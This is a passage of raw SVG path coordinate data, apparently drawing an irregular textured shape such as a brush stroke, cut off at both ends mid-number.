-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.8